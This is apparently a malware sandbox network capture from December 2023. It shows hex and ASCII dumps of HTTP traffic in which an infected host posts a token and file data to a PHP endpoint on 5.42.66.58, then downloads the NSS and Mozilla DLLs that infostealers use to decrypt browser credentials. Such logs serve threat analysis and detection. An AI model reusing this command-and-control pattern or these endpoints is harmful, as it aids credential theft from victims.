64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00 2e 00 00 00 14 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 35 37 00 00 00 00 00 5c 0b 00 00 00 c0 0e 00 00 0c 00 00 00 42 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 37 30 00 00 00 00 00 23 03 00 00 00 d0 0e 00 00 04 00 00 00 4e 0e 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: 0@< .text%&`P`.data\|'@(,@`.rdatapDpFT@`@.bss(`.edata,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B@0B/70#N
Dec 27, 2023 18:12:59.074065924 CET	1286	IN	Data Raw: 00 00 00 40 00 10 42 2f 38 31 00 00 00 00 00 73 3a 00 00 00 e0 0e 00 00 3c 00 00 00 52 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 32 00 00 00 00 00 50 03 00 00 00 20 0f 00 00 04 00 00 00 8e 0e 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: @B/81s:<R@B/92P @B
Dec 27, 2023 18:12:59.084208965 CET	1286	IN	Data Raw: 5d c3 8d b4 26 00 00 00 00 e8 2b e9 0a 00 8d 43 ff 89 7c 24 08 89 5c 24 04 89 34 24 83 f8 01 77 8c e8 23 fd ff ff 83 ec 0c 85 c0 74 bf 89 7c 24 08 89 5c 24 04 89 34 24 e8 ac f6 0a 00 83 ec 0c 85 c0 89 c5 75 23 83 fb 01 75 a1 89 7c 24 08 c7 44 24 Data Ascii: ]&+C\|$\$4$w#t\|$\$4$u#u\|$D$4$t&up\|$D$4$rZ\|$D$4$Q\|$D$4$*\|$D$4$s\|$D$4$
Dec 27, 2023 18:12:59.094463110 CET	1286	IN	Data Raw: 08 85 d2 74 04 0f b6 42 14 5d c3 55 31 c0 89 e5 8b 55 08 85 d2 74 03 8b 42 10 5d c3 55 31 c0 89 e5 8b 55 08 85 d2 74 11 8b 4a 10 85 c9 74 0a 8b 42 04 c6 04 08 00 8b 42 04 5d c3 8b 10 8d 4a 01 89 08 0f b6 12 81 fa bf 00 00 00 76 59 55 0f b6 92 40 Data Ascii: tB]U1UtB]U1UtJtBB]JvYU@aSuK?v"%=t=D[]USI1t9sAvuA@[] gatU$
Dec 27, 2023 18:12:59.104648113 CET	1286	IN	Data Raw: 18 83 e3 7f c7 42 04 00 00 00 00 b0 02 c1 e3 07 09 cb 89 1a e9 4c 01 00 00 0f b6 70 02 0f b6 db c1 e3 0e 09 f3 f6 c3 80 75 1e 83 e1 7f 81 e3 7f c0 1f 00 c7 42 04 00 00 00 00 c1 e1 07 b0 03 09 cb 89 1a e9 1d 01 00 00 0f b6 70 03 0f b6 c9 81 e3 7f Data Ascii: BLpuBpuBxMMuMZ2Mx]uZxu
Dec 27, 2023 18:13:03.907229900 CET	198	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GDHDHJEBGHJKFIECBGCB Host: 5.42.66.58 Content-Length: 4599 Connection: Keep-Alive Cache-Control: no-cache
Dec 27, 2023 18:13:05.370517969 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 17:13:05 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 27, 2023 18:13:05.906405926 CET	198	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JKECFCFBGDHIECAAFIID Host: 5.42.66.58 Content-Length: 1451 Connection: Keep-Alive Cache-Control: no-cache
Dec 27, 2023 18:13:06.572801113 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 17:13:06 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 27, 2023 18:13:06.673228979 CET	552	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CBKJJEHCBAKFBFHJKFBK Host: 5.42.66.58 Content-Length: 355 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 43 42 4b 4a 4a 45 48 43 42 41 4b 46 42 46 48 4a 4b 46 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 37 38 30 33 39 31 37 31 35 30 63 36 30 33 37 36 34 65 33 62 65 39 37 31 33 36 36 66 34 39 64 61 61 62 65 64 63 66 31 62 35 32 35 66 63 61 61 64 34 64 62 66 32 30 39 37 62 38 34 39 34 32 34 32 32 64 33 62 35 65 35 0d 0a 2d 2d 2d 2d 2d 2d 43 42 4b 4a 4a 45 48 43 42 41 4b 46 42 46 48 4a 4b 46 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 4e 54 45 35 4e 54 55 31 4e 53 35 6d 61 57 78 6c 0d 0a 2d 2d 2d 2d 2d 2d 43 42 4b 4a 4a 45 48 43 42 41 4b 46 42 46 48 4a 4b 46 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 43 42 4b 4a 4a 45 48 43 42 41 4b 46 42 46 48 4a 4b 46 42 4b 2d 2d 0d 0a Data Ascii: ------CBKJJEHCBAKFBFHJKFBKContent-Disposition: form-data; name="token"47803917150c603764e3be971366f49daabedcf1b525fcaad4dbf2097b84942422d3b5e5------CBKJJEHCBAKFBFHJKFBKContent-Disposition: form-data; name="file_name"NTE5NTU1NS5maWxl------CBKJJEHCBAKFBFHJKFBKContent-Disposition: form-data; name="file"------CBKJJEHCBAKFBFHJKFBK--
Dec 27, 2023 18:13:07.312230110 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 17:13:07 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 27, 2023 18:13:10.831352949 CET	552	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FHCGCAAKJDHJJJJJKKKF Host: 5.42.66.58 Content-Length: 355 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 46 48 43 47 43 41 41 4b 4a 44 48 4a 4a 4a 4a 4a 4b 4b 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 37 38 30 33 39 31 37 31 35 30 63 36 30 33 37 36 34 65 33 62 65 39 37 31 33 36 36 66 34 39 64 61 61 62 65 64 63 66 31 62 35 32 35 66 63 61 61 64 34 64 62 66 32 30 39 37 62 38 34 39 34 32 34 32 32 64 33 62 35 65 35 0d 0a 2d 2d 2d 2d 2d 2d 46 48 43 47 43 41 41 4b 4a 44 48 4a 4a 4a 4a 4a 4b 4b 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 4e 54 45 35 4e 54 55 31 4e 53 35 6d 61 57 78 6c 0d 0a 2d 2d 2d 2d 2d 2d 46 48 43 47 43 41 41 4b 4a 44 48 4a 4a 4a 4a 4a 4b 4b 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 46 48 43 47 43 41 41 4b 4a 44 48 4a 4a 4a 4a 4a 4b 4b 4b 46 2d 2d 0d 0a Data Ascii: ------FHCGCAAKJDHJJJJJKKKFContent-Disposition: form-data; name="token"47803917150c603764e3be971366f49daabedcf1b525fcaad4dbf2097b84942422d3b5e5------FHCGCAAKJDHJJJJJKKKFContent-Disposition: form-data; name="file_name"NTE5NTU1NS5maWxl------FHCGCAAKJDHJJJJJKKKFContent-Disposition: form-data; name="file"------FHCGCAAKJDHJJJJJKKKF--
Dec 27, 2023 18:13:11.240411043 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 17:13:11 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 27, 2023 18:13:14.178222895 CET	89	OUT	GET /f059ec3d7eb90876/freebl3.dll HTTP/1.1 Host: 5.42.66.58 Cache-Control: no-cache
Dec 27, 2023 18:13:14.691237926 CET	1286	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 17:13:14 GMT Content-Type: application/x-msdos-program Content-Length: 685392 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "a7550-5e7e950876500" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHSxFP/# @.text `.rdata @@.data<F0@.00cfg@@.rsrcx@@.reloc#$"@B
Dec 27, 2023 18:13:16.540532112 CET	89	OUT	GET /f059ec3d7eb90876/mozglue.dll HTTP/1.1 Host: 5.42.66.58 Cache-Control: no-cache
Dec 27, 2023 18:13:16.949623108 CET	1286	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 17:13:16 GMT Content-Type: application/x-msdos-program Content-Length: 608080 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "94750-5e7e950876500" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W, P/0AShZ.texta `.rdata@@.dataD@.00cfg@@.tls@.rsrc @@.relocA0B@B
Dec 27, 2023 18:13:17.747989893 CET	90	OUT	GET /f059ec3d7eb90876/msvcp140.dll HTTP/1.1 Host: 5.42.66.58 Cache-Control: no-cache
Dec 27, 2023 18:13:18.195530891 CET	1286	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 17:13:18 GMT Content-Type: application/x-msdos-program Content-Length: 450024 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "6dde8-5e7e950876500" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL0]"!(`@,@AgrA=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B
Dec 27, 2023 18:13:20.093317986 CET	86	OUT	GET /f059ec3d7eb90876/nss3.dll HTTP/1.1 Host: 5.42.66.58 Cache-Control: no-cache
Dec 27, 2023 18:13:20.493015051 CET	1286	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 17:13:20 GMT Content-Type: application/x-msdos-program Content-Length: 2046288 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "1f3950-5e7e950876500" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 